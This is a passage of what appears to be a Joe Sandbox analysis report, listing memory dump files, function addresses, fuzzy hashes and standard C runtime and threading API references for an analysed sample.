Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e60fd9c85d4a8054ca107c5b5b6cc7dd17eab638b4a97898dabcf9d5fbe01ace
Instruction ID: 66077be4b20e09f7a2801a79caa6399ad17cc63fdfaa11bf94c81d6d9aed6d19
Opcode Fuzzy Hash: e60fd9c85d4a8054ca107c5b5b6cc7dd17eab638b4a97898dabcf9d5fbe01ace
Instruction Fuzzy Hash: 2E810474A003468FDB16DF68D8907EEFBF9BB19300F1542A9D850A7B93D3359945CBA0

Function 003C78BB Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab2e5e730a9730641b1e910d55f53571279813727745efc65db4ec46ee961949
Instruction ID: ea7b532bd226709472f4bbd4e80ce66a3382f5f21ec88b40f7820aa80f63dfaf
Opcode Fuzzy Hash: ab2e5e730a9730641b1e910d55f53571279813727745efc65db4ec46ee961949
Instruction Fuzzy Hash: 4C21B673F2043947770CC47E8C5627DB6E1C78C641745423AE8A6EA2C1D968D917E2E4

Function 003C779B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0bd5032e6625a1ec3c7d01ee6ec4ae8295ab165d3b54efa9ad27063d251e50a2
Instruction ID: ffbbb86e134362a9e68f814168744572cce9ed68edeb0dff1bd47afe00f188d8
Opcode Fuzzy Hash: 0bd5032e6625a1ec3c7d01ee6ec4ae8295ab165d3b54efa9ad27063d251e50a2
Instruction Fuzzy Hash: 3711A723F30C255A675C816D8C1727AA5D6DBD824070F433AD826EB284E894DE13D390

Function 003C8860 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 69368e33383e1e94eef2ceab35efabe13634146fb6e6488aa9fcdc9ed388e530
Instruction ID: 90555b19eded647fbbc5b3e657369296011aed76b92decc87cf19f4a4c3e4123
Opcode Fuzzy Hash: 69368e33383e1e94eef2ceab35efabe13634146fb6e6488aa9fcdc9ed388e530
Instruction Fuzzy Hash: FD11D37720038253E606872DCCB4FF6A795EAC53217AE427ED052CBF98DE229F459700

Function 003BA302 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
Instruction ID: 9694cfa04b896cf0a9a3c485a5b5f73927ad55e19347adee08789e16f72da47a
Opcode Fuzzy Hash: 8bfb7b8e78c370f2913f61a25c6defe040cdd2114a4e27868ad6e7523cb31ccb
Instruction Fuzzy Hash: DAE08C32D21A28EBCB16DB98C9049CAF3ECEB49B04B65049AF605D7550C270DE00C7D0

Function 00382EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00382F5F
GetCurrentThreadId.KERNEL32 ref: 00382F7E
__Mtx_unlock.LIBCPMT ref: 00382FCC
__Cnd_broadcast.LIBCPMT ref: 00382FE3
__Mtx_unlock.LIBCPMT ref: 003830F5
GetCurrentThreadId.KERNEL32 ref: 00383132
__Mtx_unlock.LIBCPMT ref: 0038319B

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
String ID:
API String ID: 57040152-0
Opcode ID: 88062d3173601c88740517104c7271a4bc52b9677eb588a3cc9ff1d3a30ed601
Instruction ID: 5c1d0ee07124c48aab0c87a80bb52dcf9e394bb5f15d1420c32dc74de0313ac9
Opcode Fuzzy Hash: 88062d3173601c88740517104c7271a4bc52b9677eb588a3cc9ff1d3a30ed601
Instruction Fuzzy Hash: 93A1D1B0A053059FDF12EF64C94575AB7B8FF15B10F0445A9E816DB381EB35EA04CB91

Function 003BCBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 003BCC66

Strings

v;, xrefs: 003BCBE1

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2092894714.00000000003E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2093908725.00000000003E9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094519949.00000000003EB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094722825.00000000003F7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094836418.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094884503.0000000000552000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000568000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094910405.0000000000573000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094958668.00000000005A4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094973607.00000000005A5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2094990365.00000000005AC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095079944.00000000005B6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095109781.00000000005CD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095128284.00000000005CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096016106.00000000005CF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096084392.00000000005D7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096106562.00000000005E0000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096124159.00000000005E7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096139771.00000000005E8000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096154848.00000000005EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096173100.00000000005F3000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096191268.00000000005F4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096207526.00000000005FC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096223695.0000000000601000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096241440.0000000000609000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096256386.000000000060A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096271077.000000000060B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096289726.000000000064E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096349740.000000000067F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096365417.0000000000680000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096384051.0000000000689000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096402815.0000000000696000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2096421814.0000000000697000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_file.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID: v;
API String ID: 3213747228-744465352
Opcode ID: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
Instruction ID: 64d7e068114fa4c4dd0dc00cddff574fa51a3cf8c5708a41b0432d430475b5d1
Opcode Fuzzy Hash: e735d7118d15e2b04af68ee7be9476ee50b6c15cebd4be360e770f4c3f107c3f
Instruction Fuzzy Hash: 36B158329202469FDB32CF28C881BEEBFE5EF55348F15516AE644EFA41D6349D02CB60

Function 0039BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0039BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0039BBE4
_xtime_get.LIBCPMT ref: 0039BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0039BC13

Memory Dump Source

Source File: 00000000.00000002.2092894714.0000000000381000.00000040.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.2092785153.0000000000380000.00000004.00000001.01000000.00000003.sdmpDownload File
